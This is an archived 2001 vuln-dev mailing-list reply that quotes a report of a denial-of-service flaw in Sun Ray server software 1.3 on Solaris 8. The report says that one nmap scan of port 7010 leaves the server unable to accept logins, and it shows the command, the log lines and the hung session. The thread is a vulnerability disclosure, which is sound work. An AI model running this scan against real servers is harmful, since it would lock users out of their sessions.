Vulnerability Development mailing list archives
RE: Again: Possible DoS attack against Sun Ray Servers?
From: "Chatfield, Randy" <Randy.Chatfield () wipp ws>
Date: Fri, 14 Dec 2001 07:47:04 -0700
Since Sun Rays are designed for private switched networks, this attack should only be possible from an internal network not accessible from the INTERNET. It would be possible for internal network users to launch this type of attack against their Sun Ray server. It would seem that once Sun was notified of this problem, it should be promptly remedied. Best regards, Randy Chatfield -----Original Message----- From: Hanspeter Schmid [mailto:hps () bernafon ch] Sent: Thursday, December 13, 2001 11:45 PM To: 'vuln-dev () securityfocus com' Subject: Again: Possible DoS attack against Sun Ray Servers? I have used a patch-reboot cycle to make an experiment. A simple nmap -p 7010 brnray is sufficient to shut down port 7010 of my SunRay server brnray for good. This concerns SunRay server software 1.3 on Solaris 8, with, maybe, almost the latest patches. Hanspi P.S. A small protocol. I worked on brnfire; brnray is the SunRay server brnfire> telnet brnray 7010
status
[[[output O.K.]]] brnfire> nmap -p 7010 brnray --- log entries Dec 14 07:21:09 brnfire sudo: [ID 850335 local2.notice] hps : TTY=pts/16 ; PWD=/home/hps ; USER=root ; COMMAND=/usr/sepp/bin/nmap -p 7010 brnray Dec 14 07:21:09 brnray utauthd: [ID 250799 user.info] CallBack0 UNEXPECTED: Cannot accept on socket: java.net.SocketException: Software caused connection abort ---- brnfire> telnet brnray 7010 [[[session hangs]]] [[[From this point on, users cannot log in anymore, and users that are already logged in may lose their sessions.]]]
Current thread:
- Again: Possible DoS attack against Sun Ray Servers? Hanspeter Schmid (Dec 13)
- <Possible follow-ups>
- RE: Again: Possible DoS attack against Sun Ray Servers? Chatfield, Randy (Dec 14)